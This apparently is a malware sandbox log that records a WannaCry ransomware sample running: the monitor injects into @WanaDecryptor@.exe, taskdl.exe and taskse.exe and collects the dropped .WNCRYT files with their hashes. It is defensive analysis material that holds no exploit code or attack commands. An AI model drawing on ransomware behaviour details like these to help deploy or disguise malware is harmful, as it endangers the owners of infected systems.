2025-12-08 09:10:40,390 [root] INFO: Loaded monitor into process with pid 1044
2025-12-08 09:10:40,390 [root] DEBUG: 1044: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x00401607, thread 2168).
2025-12-08 09:10:40,390 [root] DEBUG: Loader: Injecting process 300 (thread 1868) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,390 [root] DEBUG: 1044: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:10:40,390 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:40,390 [root] DEBUG: 1044: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:40,390 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:40,390 [root] DEBUG: 1044: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:40,390 [root] DEBUG: 1044: DLL loaded at 0x74670000: C:\Windows\system32\Wtsapi32 (0xd000 bytes).
2025-12-08 09:10:40,390 [root] DEBUG: 1044: DLL loaded at 0x74590000: C:\Windows\system32\WINSTA (0x29000 bytes).
2025-12-08 09:10:40,390 [lib.api.process] INFO: Injected into 32-bit <Process 300 @WanaDecryptor@.exe>
2025-12-08 09:10:40,406 [root] DEBUG: 1044: DLL loaded at 0x75120000: C:\Windows\syswow64\userenv (0x19000 bytes).
2025-12-08 09:10:40,406 [root] DEBUG: 300: Python path set to 'C:\Python38'.
2025-12-08 09:10:40,406 [root] DEBUG: 1044: DLL loaded at 0x75AC0000: C:\Windows\syswow64\profapi (0xb000 bytes).
2025-12-08 09:10:40,406 [root] DEBUG: 300: Dropped file limit defaulting to 100.
2025-12-08 09:10:40,406 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:40,406 [root] DEBUG: 300: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:40,406 [root] DEBUG: 300: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:10:40,421 [root] DEBUG: 300: Monitor initialised: 32-bit capemon loaded in process 300 at 0x74260000, thread 1868, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:10:40,421 [root] DEBUG: 300: Commandline: @WanaDecryptor@.exe
2025-12-08 09:10:40,421 [root] DEBUG: 300: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:40,421 [root] DEBUG: 300: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:10:40,421 [root] DEBUG: 300: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:10:40,421 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:10:40,421 [root] DEBUG: 300: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:10:40,421 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:10:40,421 [root] DEBUG: 300: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:10:40,437 [root] DEBUG: 300: Hooked 611 out of 613 functions
2025-12-08 09:10:40,437 [root] DEBUG: 300: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:10:40,437 [root] DEBUG: 300: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2c0000
2025-12-08 09:10:40,437 [root] INFO: Loaded monitor into process with pid 300
2025-12-08 09:10:40,437 [root] DEBUG: 300: DLL loaded at 0x71E10000: C:\Windows\system32\odbcint (0x38000 bytes).
2025-12-08 09:10:40,437 [root] DEBUG: 300: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004131BD, thread 1868).
2025-12-08 09:10:40,437 [root] DEBUG: 300: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:10:40,437 [root] DEBUG: 300: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:10:40,437 [root] DEBUG: 300: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:40,437 [root] DEBUG: 300: NtTerminateProcess hook: Attempting to dump process 300
2025-12-08 09:10:40,453 [root] DEBUG: 300: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:40,453 [root] INFO: Process with pid 300 has terminated
2025-12-08 09:10:40,625 [root] DEBUG: 1044: NtTerminateProcess hook: Attempting to dump process 1044
2025-12-08 09:10:40,625 [root] DEBUG: 1044: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:40,625 [root] INFO: Process with pid 1044 has terminated
2025-12-08 09:10:44,656 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2212: C:\Users\user\AppData\Local\Temp\taskdl.exe, ImageBase: 0x00400000
2025-12-08 09:10:44,656 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2212
2025-12-08 09:10:44,656 [lib.api.process] INFO: Monitor config for <Process 2212 taskdl.exe>: C:\tmp2azv04x4\dll\2212.ini
2025-12-08 09:10:44,656 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:44,671 [root] DEBUG: Loader: Injecting process 2212 (thread 2116) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:44,671 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:44,671 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:44,671 [lib.api.process] INFO: Injected into 32-bit <Process 2212 taskdl.exe>
2025-12-08 09:10:44,671 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2212
2025-12-08 09:10:44,671 [lib.api.process] INFO: Monitor config for <Process 2212 taskdl.exe>: C:\tmp2azv04x4\dll\2212.ini
2025-12-08 09:10:44,671 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:44,687 [root] DEBUG: Loader: Injecting process 2212 (thread 2116) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:44,687 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:44,687 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:44,687 [lib.api.process] INFO: Injected into 32-bit <Process 2212 taskdl.exe>
2025-12-08 09:10:44,703 [root] DEBUG: 2212: Python path set to 'C:\Python38'.
2025-12-08 09:10:44,703 [root] DEBUG: 2212: Dropped file limit defaulting to 100.
2025-12-08 09:10:44,703 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:44,703 [root] DEBUG: 2212: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:44,703 [root] DEBUG: 2212: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:44,703 [root] DEBUG: 2212: Monitor initialised: 32-bit capemon loaded in process 2212 at 0x74260000, thread 2116, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:10:44,703 [root] DEBUG: 2212: Commandline: taskdl.exe
2025-12-08 09:10:44,703 [root] DEBUG: 2212: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:44,718 [root] DEBUG: 2212: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:10:44,718 [root] DEBUG: 2212: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:10:44,718 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:10:44,718 [root] DEBUG: 2212: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:10:44,718 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:10:44,718 [root] DEBUG: 2212: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:10:44,718 [root] DEBUG: 2212: Hooked 611 out of 613 functions
2025-12-08 09:10:44,718 [root] DEBUG: 2212: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:10:44,718 [root] DEBUG: 2212: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x270000
2025-12-08 09:10:44,718 [root] INFO: Loaded monitor into process with pid 2212
2025-12-08 09:10:44,718 [root] DEBUG: 2212: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004019B1, thread 2116).
2025-12-08 09:10:44,718 [root] DEBUG: 2212: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:10:44,718 [root] DEBUG: 2212: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:44,718 [root] DEBUG: 2212: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:44,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\397.WNCRYT to files\2e466986fedf0a58843a0bdfc56a66a013b5ba99790e9bb090bc29267b0723cd; Size is 16384; Max size: 100000000
2025-12-08 09:10:44,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\398.WNCRYT to files\ae49e7b1b33cd6745aeaef65e573334e2ff62bebf92156cc4fb1f897b784c87d; Size is 1216; Max size: 100000000
2025-12-08 09:10:44,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\402.WNCRYT to files\2a56432f97d9d2da6458ff9007c160a5f6290b440cb103147e85dbcc556b850a; Size is 194520; Max size: 100000000
2025-12-08 09:10:44,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\403.WNCRYT to files\ea5bb9cfce65caa7b056caa51a4ca412fa91212926a155d0be8ebb380ccbbd81; Size is 1048; Max size: 100000000
2025-12-08 09:10:44,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\405.WNCRYT to files\04de69a4c406df958f1bc6c00ba29c059c80e0d288cd44344271c9f3b2383d46; Size is 2328; Max size: 100000000
2025-12-08 09:10:44,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\407.WNCRYT to files\e65bdf9784b740cd90f964cfbd4d7fbe46cab5ee81fb8c240b085e52e9bc7d99; Size is 1048; Max size: 100000000
2025-12-08 09:10:44,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\408.WNCRYT to files\b25f2c0f229346e58576a66a0707402d03be1abecb04c2741d577d80e86c0ad7; Size is 415096; Max size: 100000000
2025-12-08 09:10:44,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\409.WNCRYT to files\11169d1e56565e93b09d1c6bbbb0d677c69991106619938dea14584150296136; Size is 1216; Max size: 100000000
2025-12-08 09:10:44,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\454.WNCRYT to files\e58a3a6f3cdd379c9e867f3c75a333175f51576e67a9df46975d86c660a0187f; Size is 125712; Max size: 100000000
2025-12-08 09:10:44,781 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\455.WNCRYT to files\cdb0566e58cec8b9cd768a2d6d9eb3d5c705b4764d45abcc0daafe5bdb483705; Size is 1048576; Max size: 100000000
2025-12-08 09:10:44,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\456.WNCRYT to files\4289aef4eebf7ecc6bea4bb9dc0c98e4d7757522c52cc994928ad10c0122e512; Size is 3256; Max size: 100000000
2025-12-08 09:10:44,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\518.WNCRYT to files\ee3e1212dbd47e058e30b119a92f853d3962558065fa3065ad5c1d47654c4140; Size is 24; Max size: 100000000
2025-12-08 09:10:44,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\519.WNCRYT to files\8429d5c6eb134eb64d8b0f3ecce83ab4d4d16e73c2d76993163372692b65ea8f; Size is 24; Max size: 100000000
2025-12-08 09:10:44,828 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\520.WNCRYT to files\05da3daa836dc6ed72144dff35f8d90396b4d524dc35ef8d8cd01d86855be858; Size is 24; Max size: 100000000
2025-12-08 09:10:44,843 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\521.WNCRYT to files\62ce260f5e10fc17bf63faafa39912febf61d20fad51cc11606a295801743799; Size is 24; Max size: 100000000
2025-12-08 09:10:44,843 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\78.WNCRYT to files\247b1c7140f629ddee255d7eb0704635edb22169f52745f20b442dc4a4f4bf42; Size is 8192; Max size: 100000000
2025-12-08 09:10:48,421 [lib.common.results] WARNING: File C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT size is too big: 1468006400, ignoring
2025-12-08 09:10:48,437 [root] DEBUG: 2212: NtTerminateProcess hook: Attempting to dump process 2212
2025-12-08 09:10:48,437 [root] DEBUG: 2212: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:48,437 [root] INFO: Process with pid 2212 has terminated
2025-12-08 09:10:52,328 [root] DEBUG: 1792: NtTerminateProcess hook: Attempting to dump process 1792
2025-12-08 09:10:52,328 [root] DEBUG: 1792: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:52,328 [root] INFO: Process with pid 1792 has terminated
2025-12-08 09:11:10,390 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2260: C:\Users\user\AppData\Local\Temp\taskse.exe, ImageBase: 0x00400000
2025-12-08 09:11:10,390 [root] INFO: Announced 32-bit process name: taskse.exe pid: 2260
2025-12-08 09:11:10,390 [lib.api.process] INFO: Monitor config for <Process 2260 taskse.exe>: C:\tmp2azv04x4\dll\2260.ini
2025-12-08 09:11:10,390 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:11:10,390 [root] DEBUG: Loader: Injecting process 2260 (thread 1368) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,406 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:11:10,406 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,406 [lib.api.process] INFO: Injected into 32-bit <Process 2260 taskse.exe>
2025-12-08 09:11:10,406 [root] INFO: Announced 32-bit process name: taskse.exe pid: 2260
2025-12-08 09:11:10,406 [lib.api.process] INFO: Monitor config for <Process 2260 taskse.exe>: C:\tmp2azv04x4\dll\2260.ini
2025-12-08 09:11:10,406 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:11:10,421 [root] DEBUG: Loader: Injecting process 2260 (thread 1368) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,421 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:11:10,421 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,421 [lib.api.process] INFO: Injected into 32-bit <Process 2260 taskse.exe>
2025-12-08 09:11:10,437 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 1648: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:11:10,437 [root] DEBUG: 2260: Python path set to 'C:\Python38'.
2025-12-08 09:11:10,437 [root] DEBUG: 2260: Dropped file limit defaulting to 100.
2025-12-08 09:11:10,437 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 1648
2025-12-08 09:11:10,437 [lib.api.process] INFO: Monitor config for <Process 1648 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\1648.ini
2025-12-08 09:11:10,437 [root] INFO: Disabling sleep skipping.
2025-12-08 09:11:10,437 [root] DEBUG: 2260: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:11:10,437 [root] DEBUG: 2260: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:11:10,437 [root] DEBUG: 2260: Monitor initialised: 32-bit capemon loaded in process 2260 at 0x74260000, thread 1368, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:11:10,437 [root] DEBUG: 2260: Commandline: taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
2025-12-08 09:11:10,437 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:11:10,437 [root] DEBUG: 2260: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:11:10,453 [root] DEBUG: 2260: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:11:10,453 [root] DEBUG: 2260: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:11:10,453 [root] DEBUG: Loader: Injecting process 1648 (thread 2224) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,453 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:11:10,453 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:11:10,453 [root] DEBUG: 2260: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:11:10,468 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,468 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:11:10,468 [lib.api.process] INFO: Injected into 32-bit <Process 1648 @WanaDecryptor@.exe>
2025-12-08 09:11:10,468 [root] DEBUG: 2260: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:11:10,468 [root] DEBUG: 2260: Hooked 611 out of 613 functions
2025-12-08 09:11:10,468 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 1648
2025-12-08 09:11:10,468 [root] DEBUG: 2260: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:11:10,468 [lib.api.process] INFO: Monitor config for <Process 1648 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\1648.ini
2025-12-08 09:11:10,484 [root] DEBUG: 2260: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x280000
2025-12-08 09:11:10,484 [root] INFO: Loaded monitor into process with pid 2260
2025-12-08 09:11:10,484 [root] DEBUG: 2260: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x00401607, thread 1368).
2025-12-08 09:11:10,484 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:11:10,484 [root] DEBUG: 2260: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:11:10,484 [root] DEBUG: 2260: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:11:10,484 [root] DEBUG: Loader: Injecting process 1648 (thread 2224) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,484 [root] DEBUG: 2260: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:11:10,484 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:11:10,484 [root] DEBUG: 2260: DLL loaded at 0x74660000: C:\Windows\system32\Wtsapi32 (0xd000 bytes).
2025-12-08 09:11:10,500 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:10,500 [root] DEBUG: 2260: DLL loaded at 0x74560000: C:\Windows\system32\WINSTA (0x29000 bytes).
2025-12-08 09:11:10,500 [lib.api.process] INFO: Injected into 32-bit <Process 1648 @WanaDecryptor@.exe>
2025-12-08 09:11:10,500 [root] DEBUG: 1648: Python path set to 'C:\Python38'.
2025-12-08 09:11:10,500 [root] DEBUG: 2260: DLL loaded at 0x75120000: C:\Windows\syswow64\userenv (0x19000 bytes).
2025-12-08 09:11:10,500 [root] DEBUG: 1648: Dropped file limit defaulting to 100.
2025-12-08 09:11:10,500 [root] DEBUG: 2260: DLL loaded at 0x75AC0000: C:\Windows\syswow64\profapi (0xb000 bytes).
2025-12-08 09:11:10,500 [root] INFO: Disabling sleep skipping.
2025-12-08 09:11:10,515 [root] DEBUG: 1648: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:11:10,515 [root] DEBUG: 1648: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:11:10,515 [root] DEBUG: 1648: Monitor initialised: 32-bit capemon loaded in process 1648 at 0x74260000, thread 2224, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:11:10,515 [root] DEBUG: 1648: Commandline: @WanaDecryptor@.exe
2025-12-08 09:11:10,515 [root] DEBUG: 1648: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:11:10,515 [root] DEBUG: 1648: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:11:10,515 [root] DEBUG: 1648: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:11:10,531 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:11:10,531 [root] DEBUG: 1648: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:11:10,531 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:11:10,531 [root] DEBUG: 1648: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:11:10,531 [root] DEBUG: 1648: Hooked 611 out of 613 functions
2025-12-08 09:11:10,531 [root] DEBUG: 1648: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:11:10,531 [root] DEBUG: 1648: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x280000
2025-12-08 09:11:10,531 [root] INFO: Loaded monitor into process with pid 1648
2025-12-08 09:11:10,531 [root] DEBUG: 1648: DLL loaded at 0x71E10000: C:\Windows\system32\odbcint (0x38000 bytes).
2025-12-08 09:11:10,531 [root] DEBUG: 1648: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004131BD, thread 2224).
2025-12-08 09:11:10,531 [root] DEBUG: 1648: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:11:10,546 [root] DEBUG: 1648: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:11:10,546 [root] DEBUG: 1648: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:11:10,546 [root] DEBUG: 1648: NtTerminateProcess hook: Attempting to dump process 1648
2025-12-08 09:11:10,546 [root] DEBUG: 1648: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:10,546 [root] INFO: Process with pid 1648 has terminated
2025-12-08 09:11:10,718 [root] DEBUG: 2260: NtTerminateProcess hook: Attempting to dump process 2260
2025-12-08 09:11:10,718 [root] DEBUG: 2260: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:10,718 [root] INFO: Process with pid 2260 has terminated
2025-12-08 09:11:18,437 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2580: C:\Users\user\AppData\Local\Temp\taskdl.exe, ImageBase: 0x00400000
2025-12-08 09:11:18,437 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2580
2025-12-08 09:11:18,437 [lib.api.process] INFO: Monitor config for <Process 2580 taskdl.exe>: C:\tmp2azv04x4\dll\2580.ini
2025-12-08 09:11:18,437 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:11:18,453 [root] DEBUG: Loader: Injecting process 2580 (thread 1696) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:18,453 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:11:18,453 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:18,453 [lib.api.process] INFO: Injected into 32-bit <Process 2580 taskdl.exe>
2025-12-08 09:11:18,468 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2580
2025-12-08 09:11:18,468 [lib.api.process] INFO: Monitor config for <Process 2580 taskdl.exe>: C:\tmp2azv04x4\dll\2580.ini
2025-12-08 09:11:18,468 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:11:18,468 [root] DEBUG: Loader: Injecting process 2580 (thread 1696) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:18,468 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:11:18,468 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:11:18,468 [lib.api.process] INFO: Injected into 32-bit <Process 2580 taskdl.exe>
2025-12-08 09:11:18,484 [root] DEBUG: 2580: Python path set to 'C:\Python38'.
2025-12-08 09:11:18,484 [root] DEBUG: 2580: Dropped file limit defaulting to 100.
2025-12-08 09:11:18,484 [root] INFO: Disabling sleep skipping.
2025-12-08 09:11:18,484 [root] DEBUG: 2580: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:11:18,484 [root] DEBUG: 2580: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:11:18,484 [root] DEBUG: 2580: Monitor initialised: 32-bit capemon loaded in process 2580 at 0x74260000, thread 1696, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:11:18,500 [root] DEBUG: 2580: Commandline: taskdl.exe
2025-12-08 09:11:18,500 [root] DEBUG: 2580: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:11:18,500 [root] DEBUG: 2580: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:11:18,500 [root] DEBUG: 2580: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:11:18,500 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:11:18,500 [root] DEBUG: 2580: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:11:18,500 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:11:18,500 [root] DEBUG: 2580: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:11:18,500 [root] DEBUG: 2580: Hooked 611 out of 613 functions
2025-12-08 09:11:18,515 [root] DEBUG: 2580: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:11:18,515 [root] DEBUG: 2580: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2f0000
2025-12-08 09:11:18,515 [root] INFO: Loaded monitor into process with pid 2580
2025-12-08 09:11:18,515 [root] DEBUG: 2580: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004019B1, thread 1696).
2025-12-08 09:11:18,515 [root] DEBUG: 2580: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:11:18,515 [root] DEBUG: 2580: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:11:18,515 [root] DEBUG: 2580: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:11:18,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\397.WNCRYT to files\2e466986fedf0a58843a0bdfc56a66a013b5ba99790e9bb090bc29267b0723cd; Size is 16384; Max size: 100000000
2025-12-08 09:11:18,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\398.WNCRYT to files\ae49e7b1b33cd6745aeaef65e573334e2ff62bebf92156cc4fb1f897b784c87d; Size is 1216; Max size: 100000000
